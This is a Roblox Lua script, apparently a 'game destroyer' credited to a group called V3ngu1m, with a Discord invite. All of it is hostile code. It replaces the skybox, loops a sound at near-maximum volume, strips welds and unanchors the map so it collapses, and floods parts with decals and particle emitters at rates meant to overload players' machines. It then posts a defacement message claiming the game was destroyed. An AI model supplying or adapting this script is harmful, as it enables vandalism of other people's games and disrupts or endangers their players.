-- this script is remake version -- Made by V3ngu1m (me) -- invite disc : discord.gg/AAc8mkWBaa local Players = game:GetService("Players") local Lighting = game:GetService("Lighting") local SoundService = game:GetService("SoundService") local Workspace = game:GetService("Workspace") local SKYBOX_ID = "rbxassetid://127476787" local SOUND_ID = "rbxassetid://1840712882" local DECAL_ID = 127476787 local PARTICLE_TEXTURE = "http://www.roblox.com/asset/?id=127476787" for _, v in ipairs(Lighting:GetChildren()) do if v:IsA("Sky") then v:Destroy() end end local sky = Instance.new("Sky") sky.SkyboxBk = SKYBOX_ID sky.SkyboxDn = SKYBOX_ID sky.SkyboxFt = SKYBOX_ID sky.SkyboxLf = SKYBOX_ID sky.SkyboxRt = SKYBOX_ID sky.SkyboxUp = SKYBOX_ID sky.Parent = Lighting local oldSound = SoundService:FindFirstChild("BackgroundSound") if oldSound then oldSound:Destroy() end local sound = Instance.new("Sound") sound.Name = "BackgroundSound" sound.SoundId = SOUND_ID sound.Looped = true sound.Volume = 999999999 sound.Parent = SoundService sound:Play() local function isCharacter(obj) local model = obj:FindFirstAncestorOfClass("Model") return model and model:FindFirstChildOfClass("Humanoid") end local function addDecal(part) for _, d in ipairs(part:GetChildren()) do if d:IsA("Decal") and d.Name == "MYDECALHUE" then d:Destroy() end end for _, face in ipairs(Enum.NormalId:GetEnumItems()) do local decal = Instance.new("Decal") decal.Name = "MYDECALHUE" decal.Face = face decal.Texture = "rbxassetid://" .. DECAL_ID decal.Parent = part end end for _, obj in ipairs(Workspace:GetDescendants()) do if not isCharacter(obj) then if obj:IsA("Weld") or obj:IsA("WeldConstraint") or obj:IsA("Motor6D") or obj:IsA("BodyMover") or obj:IsA("AlignPosition") or obj:IsA("LinearVelocity") then obj:Destroy() end end if obj:IsA("BasePart") and not isCharacter(obj) then obj.Anchored = false obj.CanCollide = true addDecal(obj) local pe = Instance.new("ParticleEmitter") pe.Texture = PARTICLE_TEXTURE pe.Rate = 99999999999 pe.Lifetime = NumberRange.new(2, 4) pe.Speed = NumberRange.new(5, 15) pe.VelocitySpread = 999999999999 pe.Parent = obj end end local h = Instance.new("Hint") h.Text = "This game has destroyed by team V3ngu1m disc invite .gg/AAc8mkWBaa" h.Parent = Workspace local m = Instance.new("Message") m.Text = "This game has destroyed by team V3ngu1m" m.Parent = Workspace